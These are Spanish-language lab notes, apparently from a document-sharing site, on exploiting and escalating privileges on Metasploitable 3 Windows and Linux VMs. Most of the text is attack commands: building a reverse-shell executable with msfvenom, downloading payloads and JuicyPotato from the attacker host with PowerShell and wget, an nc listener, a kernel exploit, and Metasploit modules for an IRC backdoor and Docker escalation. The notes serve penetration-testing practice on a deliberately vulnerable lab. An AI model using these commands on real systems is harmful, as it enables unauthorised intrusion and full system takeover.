Documentos de Académico
Documentos de Profesional
Documentos de Cultura
Hacking
Elevación de privilegios
Metasploitable 3 -
Windows
Explotación puerto: 8585
firefox: http://x.x.x.x:8585/wordpress
Dado que DCOM puede ejecutar programas en otros ordenadores, los hackers pueden
aprovecharlo para realizar ataques de movimiento lateral a través de su red, obteniendo
acceso a más datos. Esta actividad puede ser difícil de detectar porque no se trata de
malware ni de herramientas de hackers: todo lo que se necesita para acceder a DCOM es
PowerShell.
Explotación puerto: 8585
firefox: http://x.x.x.x:8585/wordpress
Kali:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip_kali> LPORT=4444 -f exe -o reverse.exe
Windows:
powershell.exe -c "iwr -uri http://1<ip_kali>/reverse.exe -outfile reverse.exe"
powershell.exe -c "iwr -uri http://<ip_kali>/JuicyPotato.exe -outfile JuicyPotato.exe"
Explotación:
Kali:
nc -nlvp 4444
Explotación:
Windows:
JuicyPotato.exe -t * -p C:\wamp\www\wordpress\rev.exe -l 1337
Metasploitable 3 - Linux
Explotación Kernel :
https://www.exploit-db.com/exploits/37292
/usr/share/exploitdb/exploits/linux/local/37292.c
Explotación Kernel :
Kali:
Metasploitable:
wget http://<ip_kali>/37292
mv 37292 37292.c
. /root
Explotación puerto: 6697
exploit/unix/irc/unreal_ircd_3281_backdoor
Explotación Docker :
shell to meterpreter
Explotación Docker :
linux/local/docker_daemon_privilege_escalation
Explotación Docker :
linux/local/docker_daemon_privilege_escalation